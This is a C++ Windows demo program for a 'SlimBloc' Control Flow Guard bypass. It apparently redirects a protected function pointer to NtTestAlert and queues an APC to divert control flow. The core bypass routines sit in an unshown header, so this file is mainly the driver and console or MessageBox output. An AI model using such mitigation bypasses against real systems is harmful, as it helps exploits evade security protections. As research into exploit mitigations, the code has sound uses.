#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <sstream>
#include "slim.h"

// Function pointer type with CFG validation
typedef NTSTATUS (NTAPI *PFN_TEST_FUNC)();

// Global CFG-protected function pointer
PFN_TEST_FUNC g_ProtectedFunc = NULL;

// Helper function to format a thread ID
std::string GetThreadIdStr() {
    std::stringstream ss;
    ss << "Thread ID: 0x" << std::hex << GetCurrentThreadId();
    return ss.str();
}

// Display MessageBox with thread ID
void ShowThreadMessageBox(const char* title, const char* message) {
    std::string threadInfo = GetThreadIdStr();
    std::string fullMsg = std::string(message) + "\n" + threadInfo;
    MessageBoxA(NULL, fullMsg.c_str(), title, MB_OK | MB_ICONINFORMATION);
}

// Demonstration function for calling the protected pointer
DWORD WINAPI TestThread(LPVOID) {
    std::cout << "TestThread: Starting execution - " << GetThreadIdStr() << std::endl;

    // Add a clear console notification before showing MessageBox
    std::cout << "\n*** SHOWING MESSAGEBOX: Test Thread Starting ***\n" << std::endl;
    ShowThreadMessageBox("Test Thread", "Starting execution.\nAbout to call CFG-protected function.");

    // Wait a bit to ensure worker thread is ready
    Sleep(800);

    std::cout << "TestThread: Calling protected function through CFG-validated pointer" << std::endl;
    std::cout << "TestThread: Function address: 0x" << std::hex << g_ProtectedFunc << std::dec << std::endl;

    // Before calling the function, queue an APC to this thread
    // This APC will be delivered when the function is called
    SmAlertThread(GetCurrentThread());
    std::cout << "TestThread: APC queued to this thread, will be delivered when function is called" << std::endl;

    // This call should trigger our SlimAPC bypass
    if (g_ProtectedFunc) {
        // In a real-world scenario, this call would be validated by CFG
        // Our bypass technique will intercept this call
        std::cout << "TestThread: Calling g_ProtectedFunc() now..." << std::endl;

        // The next call will trigger APC delivery
        g_ProtectedFunc();

        // If the bypass works, we might not immediately return here
        // as control flow is diverted through our APC chain
        std::cout << "TestThread: Returned from function call" << std::endl;
    } else {
        std::cout << "TestThread: ERROR - g_ProtectedFunc is NULL" << std::endl;
    }

    std::cout << "\n*** SHOWING MESSAGEBOX: Test Thread Completed ***\n" << std::endl;
    ShowThreadMessageBox("Test Thread", "Returned from protected function call.\nBypass successful!");

    return 0;
}

// Test thread for simulating a new thread startup
DWORD WINAPI NewThreadStartupTest(LPVOID) {
    // This simulates a thread startup that would get intercepted
    // by the SlimBloc mechanism for new thread routing

    std::string threadId = GetThreadIdStr();
    LogMessage("New thread starting, simulating LdrInitializeThunk - %s", threadId.c_str());
    ShowThreadMessageBox("New Thread", "Starting initialization\nSimulating LdrInitializeThunk");

    // Simulate initialization delay
    for (int i = 0; i < 3; i++) {
        LogMessage("Thread initialization cycle %d", i);
        Sleep(30); // Similar to the 30ms mentioned in the doc
    }

    LogMessage("New thread initialization complete");
    ShowThreadMessageBox("New Thread", "Initialization complete");

    return 0;
}

int main() {
 //   Sleep(4000);
    std::cout << "SlimBloc CFG Bypass Demo" << std::endl;
    std::cout << "=======================" << std::endl;
    std::cout << "Main Thread: " << GetThreadIdStr() << std::endl;

    ShowThreadMessageBox("Main Thread", "SlimBloc CFG Bypass Demo Starting");

    // Initialize the SlimBloc system
    if (!InitializeSlimBloc()) {
        std::cerr << "Failed to initialize SlimBloc!" << std::endl;
        return 1;
    }

    std::cout << "SlimBloc initialized successfully" << std::endl;

    // Setup CFG bypass - make this more explicit
    std::cout << "Setting up CFG bypass - redirecting to NtTestAlert..." << std::endl;
    g_ProtectedFunc = (PFN_TEST_FUNC)SetupCfgBypass();

    if (!g_ProtectedFunc) {
        std::cerr << "Failed to setup CFG bypass!" << std::endl;
        return 1;
    }

    std::cout << "CFG bypass setup complete - protected function at 0x"
              << std::hex << g_ProtectedFunc << std::dec << std::endl;

    // Create a test thread with explicit ID logging
    std::cout << "Creating test thread to demonstrate CFG bypass..." << std::endl;
    DWORD testThreadId = 0;
    HANDLE hThread = CreateThread(NULL, 0, TestThread, NULL, 0, &testThreadId);
    if (!hThread) {
        std::cerr << "Failed to create test thread!" << std::endl;
        return 1;
    }
    std::cout << "Test thread created with ID: 0x" << std::hex << testThreadId << std::dec << std::endl;

    // Wait for the test thread to complete
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);

    std::cout << "Test thread completed" << std::endl;

    // Test new thread interception
    std::cout << "Testing new thread interception..." << std::endl;

    HANDLE hNewThread = CreateThread(NULL, 0, NewThreadStartupTest, NULL, 0, NULL);
    if (!hNewThread) {
        std::cerr << "Failed to create new thread test!" << std::endl;
    } else {
        // Wait for the thread to complete
        WaitForSingleObject(hNewThread, INFINITE);
        CloseHandle(hNewThread);
        std::cout << "New thread test completed" << std::endl;
    }

    std::cout << "SlimBloc demo completed. CFG was bypassed using SlimAPC technique." << std::endl;
    ShowThreadMessageBox("Main Thread", "SlimBloc demo completed.\nCFG was bypassed successfully!");

    // Wait for a moment before exiting to let any background activities complete
    Sleep(1000);

    return 0;
}
